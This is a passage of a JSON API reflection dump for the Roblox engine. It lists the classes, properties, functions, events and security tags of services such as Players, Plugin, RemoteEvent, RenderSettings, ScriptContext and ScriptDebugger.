ype":"Instance","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"bool","Name":"isTeleport","Default":"false"}],"Name":"CreateLocalPlayer","tags":["PluginSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"userID","Default":null}],"Name":"GetPlayerByID","tags":["LocalUserSecurity","deprecated"],"Class":"Players","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetPlayerById","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetPlayerByUserId","tags":[],"Class":"Players","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Instance","Name":"character","Default":null}],"Name":"GetPlayerFromCharacter","tags":[],"Class":"Players","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetPlayers","tags":[],"Class":"Players","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"GetUseCoreScriptHealthBar","tags":["RobloxScriptSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"string","Name":"reason","Default":null},{"Type":"string","Name":"optionalMessage","Default":null}],"Name":"ReportAbuse","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetAbuseReportUrl","tags":["RobloxSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetBuildUserPermissionsUrl","tags":["RobloxSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetChatFilterUrl","tags":["RobloxSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"ChatStyle","Name":"style","Default":"Classic"}],"Name":"SetChatStyle","tags":["PluginSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetLoadDataUrl","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetSaveDataUrl","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetSaveLeaderboardDataUrl","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetSysStatsUrl","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"urlId","Default":null}],"Name":"SetSysStatsUrlId","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":null}],"Name":"TeamChat","tags":["PluginSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":null},{"Type":"Instance","Name":"player","Default":null}],"Name":"WhisperChat","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Instance","Name":"character","Default":null}],"Name":"getPlayerFromCharacter","tags":["deprecated"],"Class":"Players","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"getPlayers","tags":["deprecated"],"Class":"Players","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Instance","Name":"character","Default":null}],"Name":"playerFromCharacter","tags":["deprecated"],"Class":"Players","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"players","tags":["deprecated"],"Class":"Players","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"int","Name":"blockerUserId","Default":null},{"Type":"int","Name":"blockeeUserId","Default":null}],"Name":"BlockUser","tags":["RobloxScriptSecurity"],"Class":"Players","type":"YieldFunction"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetCharacterAppearanceAsync","tags":[],"Class":"Players","type":"YieldFunction"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetFriendsAsync","tags":[],"Class":"Players","type":"YieldFunction"},{"ReturnType":"string","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetNameFromUserIdAsync","tags":[],"Class":"Players","type":"YieldFunction"},{"ReturnType":"int","Arguments":[{"Type":"string","Name":"userName","Default":null}],"Name":"GetUserIdFromNameAsync","tags":[],"Class":"Players","type":"YieldFunction"},{"ReturnType":"string","Arguments":[{"Type":"int","Name":"exblockerUserId","Default":null},{"Type":"int","Name":"exblockeeUserId","Default":null}],"Name":"UnblockUser","tags":["RobloxScriptSecurity"],"Class":"Players","type":"YieldFunction"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"player","Type":"Instance"},{"Name":"friendRequestEvent","Type":"FriendRequestEvent"}],"Name":"FriendRequestEvent","tags":["RobloxScriptSecurity"],"Class":"Players","type":"Event"},{"Arguments":[{"Name":"message","Type":"string"}],"Name":"GameAnnounce","tags":["RobloxScriptSecurity"],"Class":"Players","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"}],"Name":"PlayerAdded","tags":[],"Class":"Players","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"}],"Name":"PlayerAddedEarly","tags":["LocalUserSecurity"],"Class":"Players","type":"Event"},{"Arguments":[{"Name":"chatType","Type":"PlayerChatType"},{"Name":"player","Type":"Instance"},{"Name":"message","Type":"string"},{"Name":"targetPlayer","Type":"Instance"}],"Name":"PlayerChatted","tags":["LocalUserSecurity"],"Class":"Players","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"}],"Name":"PlayerRemoving","tags":[],"Class":"Players","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"}],"Name":"PlayerRemovingLate","tags":["LocalUserSecurity"],"Class":"Players","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Plugin","tags":[]},{"ValueType":"bool","type":"Property","Name":"CollisionEnabled","tags":["readonly"],"Class":"Plugin"},{"ValueType":"float","type":"Property","Name":"GridSize","tags":["readonly"],"Class":"Plugin"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"exclusiveMouse","Default":null}],"Name":"Activate","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"name","Default":null}],"Name":"CreateToolbar","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"JointCreationMode","Arguments":[],"Name":"GetJoinMode","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetMouse","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"Variant","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"GetSetting","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"int","Arguments":[],"Name":"GetStudioUserId","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"Objects","Arguments":[{"Type":"Objects","Name":"objects","Default":null}],"Name":"Negate","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"script","Default":null},{"Type":"int","Name":"lineNumber","Default":"0"}],"Name":"OpenScript","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"OpenWikiPage","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"SaveSelectedToRoblox","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"Objects","Arguments":[{"Type":"Objects","Name":"objects","Default":null}],"Name":"Separate","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"Variant","Name":"value","Default":null}],"Name":"SetSetting","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Objects","Name":"objects","Default":null}],"Name":"Union","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"int","Arguments":[{"Type":"string","Name":"assetType","Default":null}],"Name":"PromptForExistingAssetId","tags":["PluginSecurity"],"Class":"Plugin","type":"YieldFunction"},{"Arguments":[],"Name":"Deactivation","tags":["PluginSecurity"],"Class":"Plugin","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"PluginManager","tags":[]},{"ReturnType":"Instance","Arguments":[],"Name":"CreatePlugin","tags":["PluginSecurity"],"Class":"PluginManager","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"filePath","Default":""}],"Name":"ExportPlace","tags":["PluginSecurity"],"Class":"PluginManager","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"filePath","Default":""}],"Name":"ExportSelection","tags":["PluginSecurity"],"Class":"PluginManager","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"PointsService","tags":["notCreatable"]},{"ReturnType":"int","Arguments":[],"Name":"GetAwardablePoints","tags":["deprecated"],"Class":"PointsService","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"int","Name":"amount","Default":null}],"Name":"AwardPoints","tags":[],"Class":"PointsService","type":"YieldFunction"},{"ReturnType":"int","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetGamePointBalance","tags":[],"Class":"PointsService","type":"YieldFunction"},{"ReturnType":"int","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetPointBalance","tags":["deprecated"],"Class":"PointsService","type":"YieldFunction"},{"Arguments":[{"Name":"userId","Type":"int"},{"Name":"pointsAwarded","Type":"int"},{"Name":"userBalanceInGame","Type":"int"},{"Name":"userTotalBalance","Type":"int"}],"Name":"PointsAwarded","tags":[],"Class":"PointsService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Pose","tags":[]},{"ValueType":"CoordinateFrame","type":"Property","Name":"CFrame","tags":[],"Class":"Pose"},{"ValueType":"PoseEasingDirection","type":"Property","Name":"EasingDirection","tags":[],"Class":"Pose"},{"ValueType":"PoseEasingStyle","type":"Property","Name":"EasingStyle","tags":[],"Class":"Pose"},{"ValueType":"float","type":"Property","Name":"MaskWeight","tags":[],"Class":"Pose"},{"ValueType":"float","type":"Property","Name":"Weight","tags":[],"Class":"Pose"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"pose","Default":null}],"Name":"AddSubPose","tags":[],"Class":"Pose","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetSubPoses","tags":[],"Class":"Pose","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"pose","Default":null}],"Name":"RemoveSubPose","tags":[],"Class":"Pose","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"PostEffect","tags":[]},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"PostEffect"},{"Superclass":"PostEffect","type":"Class","Name":"BloomEffect","tags":[]},{"ValueType":"float","type":"Property","Name":"Intensity","tags":[],"Class":"BloomEffect"},{"ValueType":"float","type":"Property","Name":"Size","tags":[],"Class":"BloomEffect"},{"ValueType":"float","type":"Property","Name":"Threshold","tags":[],"Class":"BloomEffect"},{"Superclass":"PostEffect","type":"Class","Name":"BlurEffect","tags":[]},{"ValueType":"float","type":"Property","Name":"Size","tags":[],"Class":"BlurEffect"},{"Superclass":"PostEffect","type":"Class","Name":"ColorCorrectionEffect","tags":[]},{"ValueType":"float","type":"Property","Name":"Brightness","tags":[],"Class":"ColorCorrectionEffect"},{"ValueType":"float","type":"Property","Name":"Contrast","tags":[],"Class":"ColorCorrectionEffect"},{"ValueType":"float","type":"Property","Name":"Saturation","tags":[],"Class":"ColorCorrectionEffect"},{"ValueType":"Color3","type":"Property","Name":"TintColor","tags":[],"Class":"ColorCorrectionEffect"},{"Superclass":"PostEffect","type":"Class","Name":"SunRaysEffect","tags":[]},{"ValueType":"float","type":"Property","Name":"Intensity","tags":[],"Class":"SunRaysEffect"},{"ValueType":"float","type":"Property","Name":"Spread","tags":[],"Class":"SunRaysEffect"},{"Superclass":"Instance","type":"Class","Name":"RayValue","tags":[]},{"ValueType":"Ray","type":"Property","Name":"Value","tags":[],"Class":"RayValue"},{"Arguments":[{"Name":"value","Type":"Ray"}],"Name":"Changed","tags":[],"Class":"RayValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"Ray"}],"Name":"changed","tags":["deprecated"],"Class":"RayValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadata","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadataCallbacks","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadataClasses","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadataEnums","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadataEvents","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadataFunctions","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadataItem","tags":[]},{"ValueType":"bool","type":"Property","Name":"Browsable","tags":[],"Class":"ReflectionMetadataItem"},{"ValueType":"bool","type":"Property","Name":"Deprecated","tags":[],"Class":"ReflectionMetadataItem"},{"ValueType":"bool","type":"Property","Name":"IsBackend","tags":[],"Class":"ReflectionMetadataItem"},{"ValueType":"double","type":"Property","Name":"UIMaximum","tags":[],"Class":"ReflectionMetadataItem"},{"ValueType":"double","type":"Property","Name":"UIMinimum","tags":[],"Class":"ReflectionMetadataItem"},{"ValueType":"string","type":"Property","Name":"summary","tags":[],"Class":"ReflectionMetadataItem"},{"Superclass":"ReflectionMetadataItem","type":"Class","Name":"ReflectionMetadataClass","tags":[]},{"ValueType":"int","type":"Property","Name":"ExplorerImageIndex","tags":[],"Class":"ReflectionMetadataClass"},{"ValueType":"int","type":"Property","Name":"ExplorerOrder","tags":[],"Class":"ReflectionMetadataClass"},{"ValueType":"bool","type":"Property","Name":"Insertable","tags":[],"Class":"ReflectionMetadataClass"},{"ValueType":"string","type":"Property","Name":"PreferredParent","tags":[],"Class":"ReflectionMetadataClass"},{"Superclass":"ReflectionMetadataItem","type":"Class","Name":"ReflectionMetadataEnum","tags":[]},{"Superclass":"ReflectionMetadataItem","type":"Class","Name":"ReflectionMetadataEnumItem","tags":[]},{"Superclass":"ReflectionMetadataItem","type":"Class","Name":"ReflectionMetadataMember","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadataProperties","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadataYieldFunctions","tags":[]},{"Superclass":"Instance","type":"Class","Name":"RemoteEvent","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"Tuple","Name":"arguments","Default":null}],"Name":"FireAllClients","tags":[],"Class":"RemoteEvent","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"Tuple","Name":"arguments","Default":null}],"Name":"FireClient","tags":[],"Class":"RemoteEvent","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Tuple","Name":"arguments","Default":null}],"Name":"FireServer","tags":[],"Class":"RemoteEvent","type":"Function"},{"Arguments":[{"Name":"arguments","Type":"Tuple"}],"Name":"OnClientEvent","tags":[],"Class":"RemoteEvent","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"arguments","Type":"Tuple"}],"Name":"OnServerEvent","tags":[],"Class":"RemoteEvent","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"RemoteFunction","tags":[]},{"ReturnType":"Tuple","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"Tuple","Name":"arguments","Default":null}],"Name":"InvokeClient","tags":[],"Class":"RemoteFunction","type":"YieldFunction"},{"ReturnType":"Tuple","Arguments":[{"Type":"Tuple","Name":"arguments","Default":null}],"Name":"InvokeServer","tags":[],"Class":"RemoteFunction","type":"YieldFunction"},{"ReturnType":"Tuple","Arguments":[{"Name":"arguments","Type":"Tuple"}],"Name":"OnClientInvoke","tags":[],"Class":"RemoteFunction","type":"Callback"},{"ReturnType":"Tuple","Arguments":[{"Name":"player","Type":"Instance"},{"Name":"arguments","Type":"Tuple"}],"Name":"OnServerInvoke","tags":[],"Class":"RemoteFunction","type":"Callback"},{"Superclass":"Instance","type":"Class","Name":"RenderHooksService","tags":[]},{"ReturnType":"void","Arguments":[],"Name":"CaptureMetrics","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"qId","Default":null}],"Name":"DisableQueue","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"enabled","Default":null}],"Name":"EnableAdorns","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"qId","Default":null}],"Name":"EnableQueue","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"GetDeltaAve","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"GetGPUDelay","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"GetPresentTime","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"GetRenderAve","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"GetRenderConfMax","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"GetRenderConfMin","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"GetRenderStd","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"PrintScene","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ReloadShaders","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"width","Default":null},{"Type":"int","Name":"height","Default":null}],"Name":"ResizeWindow","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"RenderSettings","tags":["notbrowsable"]},{"ValueType":"AASamples","type":"Property","Name":"AASamples","tags":[],"Class":"RenderSettings"},{"ValueType":"Antialiasing","type":"Property","Name":"Antialiasing","tags":[],"Class":"RenderSettings"},{"ValueType":"int","type":"Property","Name":"AutoFRMLevel","tags":[],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"DebugDisableInterpolation","tags":[],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"EagerBulkExecution","tags":[],"Class":"RenderSettings"},{"ValueType":"QualityLevel","type":"Property","Name":"EditQualityLevel","tags":[],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"EnableFRM","tags":["hidden"],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"ExportMergeByMaterial","tags":[],"Class":"RenderSettings"},{"ValueType":"FramerateManagerMode","type":"Property","Name":"FrameRateManager","tags":[],"Class":"RenderSettings"},{"ValueType":"GraphicsMode","type":"Property","Name":"GraphicsMode","tags":[],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"IsAggregationShown","tags":[],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"IsSynchronizedWithPhysics","tags":[],"Class":"RenderSettings"},{"ValueType":"int","type":"Property","Name":"MeshCacheSize","tags":[],"Class":"RenderSettings"},{"ValueType":"QualityLevel","type":"Property","Name":"QualityLevel","tags":[],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"ReloadAssets","tags":[],"Class":"RenderSettings"},{"ValueType":"Resolution","type":"Property","Name":"Resolution","tags":[],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"ShowBoundingBoxes","tags":[],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"ShowInterpolationpath","tags":[],"Class":"RenderSettings"},{"ValueType":"int","type":"Property","Name":"TextureCacheSize","tags":[],"Class":"RenderSettings"},{"ReturnType":"int","Arguments":[],"Name":"GetMaxQualityLevel","tags":[],"Class":"RenderSettings","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"ReplicatedFirst","tags":["notCreatable"]},{"ReturnType":"bool","Arguments":[],"Name":"IsDefaultLoadingGuiRemoved","tags":["RobloxScriptSecurity"],"Class":"ReplicatedFirst","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsFinishedReplicating","tags":["RobloxScriptSecurity"],"Class":"ReplicatedFirst","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"RemoveDefaultLoadingScreen","tags":[],"Class":"ReplicatedFirst","type":"Function"},{"Arguments":[],"Name":"FinishedReplicating","tags":["RobloxScriptSecurity"],"Class":"ReplicatedFirst","type":"Event"},{"Arguments":[],"Name":"RemoveDefaultLoadingGuiSignal","tags":["RobloxScriptSecurity"],"Class":"ReplicatedFirst","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ReplicatedStorage","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"RobloxReplicatedStorage","tags":["notCreatable","notbrowsable"]},{"Superclass":"Instance","type":"Class","Name":"RunService","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"int","Name":"priority","Default":null},{"Type":"Function","Name":"function","Default":null}],"Name":"BindToRenderStep","tags":[],"Class":"RunService","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsClient","tags":[],"Class":"RunService","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsRunMode","tags":[],"Class":"RunService","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsRunning","tags":["RobloxScriptSecurity"],"Class":"RunService","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsServer","tags":[],"Class":"RunService","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsStudio","tags":[],"Class":"RunService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Pause","tags":["PluginSecurity"],"Class":"RunService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Reset","tags":["PluginSecurity","deprecated"],"Class":"RunService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Run","tags":["PluginSecurity"],"Class":"RunService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Stop","tags":["PluginSecurity"],"Class":"RunService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"name","Default":null}],"Name":"UnbindFromRenderStep","tags":[],"Class":"RunService","type":"Function"},{"Arguments":[{"Name":"step","Type":"double"}],"Name":"Heartbeat","tags":[],"Class":"RunService","type":"Event"},{"Arguments":[{"Name":"step","Type":"double"}],"Name":"RenderStepped","tags":[],"Class":"RunService","type":"Event"},{"Arguments":[{"Name":"time","Type":"double"},{"Name":"step","Type":"double"}],"Name":"Stepped","tags":[],"Class":"RunService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"RuntimeScriptService","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"ScriptContext","tags":["notCreatable"]},{"ValueType":"bool","type":"Property","Name":"ScriptsDisabled","tags":["LocalUserSecurity"],"Class":"ScriptContext"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"assetId","Default":null},{"Type":"Instance","Name":"parent","Default":null},{"Type":"string","Name":"name","Default":null}],"Name":"AddCoreScript","tags":["RobloxScriptSecurity"],"Class":"ScriptContext","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"Instance","Name":"parent","Default":null}],"Name":"AddCoreScriptLocal","tags":["RobloxScriptSecurity"],"Class":"ScriptContext","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"assetId","Default":null}],"Name":"AddStarterScript","tags":["LocalUserSecurity"],"Class":"ScriptContext","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"bool","Name":"clearHighwaterMark","Default":"true"}],"Name":"GetHeapStats","tags":["RobloxScriptSecurity"],"Class":"ScriptContext","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetScriptStats","tags":["RobloxScriptSecurity"],"Class":"ScriptContext","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"enable","Default":"false"}],"Name":"SetCollectScriptStats","tags":["RobloxScriptSecurity"],"Class":"ScriptContext","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"double","Name":"seconds","Default":null}],"Name":"SetTimeout","tags":["PluginSecurity"],"Class":"ScriptContext","type":"Function"},{"Arguments":[{"Name":"object","Type":"Instance"},{"Name":"member","Type":"string"},{"Name":"script","Type":"Instance"}],"Name":"CamelCaseViolation","tags":["RobloxScriptSecurity"],"Class":"ScriptContext","type":"Event"},{"Arguments":[{"Name":"message","Type":"string"},{"Name":"stackTrace","Type":"string"},{"Name":"script","Type":"Instance"}],"Name":"Error","tags":[],"Class":"ScriptContext","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ScriptDebugger","tags":["notCreatable"]},{"ValueType":"int","type":"Property","Name":"CurrentLine","tags":["readonly"],"Class":"ScriptDebugger"},{"ValueType":"bool","type":"Property","Name":"IsDebugging","tags":["readonly"],"Class":"ScriptDebugger"},{"ValueType":"bool","type":"Property","Name":"IsPaused","tags":["readonly"],"Class":"ScriptDebugger"},{"ValueType":"Object","type":"Property","Name":"Script","tags":["readonly"],"Class":"ScriptDebugger"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"expression","Default":null}],"Name":"AddWatch","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetBreakpoints","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"Map","Arguments":[],"Name":"GetGlobals","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"Map","Arguments":[{"Type":"int","Name":"stackFrame","Default":"0"}],"Name":"GetLocals","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetStack","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"Map","Arguments":[{"Type":"int","Name":"stackFrame","Default":"0"}],"Name":"GetUpvalues","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"Variant","Arguments":[{"Type":"Instance","Name":"watch","Default":null}],"Name":"GetWatchValue","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetWatches","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Resume","tags":["deprecated"],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"line","Default":null}],"Name":"SetBreakpoint","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"Variant","Name":"value","Default":null}],"Name":"SetGlobal","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"Variant","Name":"value","Default":null},{"Type":"int","Name":"stackFrame","Default":"0"}],"Name":"SetLocal","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"Variant","Name":"value","Default":null},{"Type":"int","Name":"stackFrame","Default":"0"}],"Name":"SetUpvalue","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"StepIn","tags":["deprecated"],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"StepOut","tags":["deprecated"],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"StepOver","tags":["deprecated"],"Class":"ScriptDebugger","type":"Function"},{"Arguments":[{"Name":"breakpoint","Type":"Instance"}],"Name":"BreakpointAdded","tags":[],"Class":"ScriptDebugger","type":"Event"},{"Arguments":[{"Name":"breakpoint","Type":"Instance"}],"Name":"BreakpointRemoved","tags":[],"Class":"ScriptDebugger","type":"Event"},{"Arguments":[{"Name":"line","Type":"int"}],"Name":"EncounteredBreak","tags":[],"Class":"ScriptDebugger","type":"Event"},{"Arguments":[],"Name":"Resuming","tags":[],"Class":"ScriptDebugger","type":"Event"},{"Arguments":[{"Name":"watch","Type":"Instance"}],"Name":"WatchAdded","tags":[],"Class":"ScriptDebugger","type":"Event"},{"Arguments":[{"Name":"watch","Type":"Instance"}],"Name":"WatchRemoved","tags":[],"Class":"ScriptDebugger","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ScriptInformationProvider","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"access","Default":null}],"Name":"SetAccessKey","tags":["RobloxSecurity"],"Class":"ScriptInformationProvider","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetAssetUrl","tags":["LocalUserSecurity"],"Class":"ScriptInformationProvider","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"ScriptService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"Selection","tags":[]},{"ReturnType":"Objects","Arguments":[],"Name":"Get","tags":["PluginSecurity"],"Class":"Se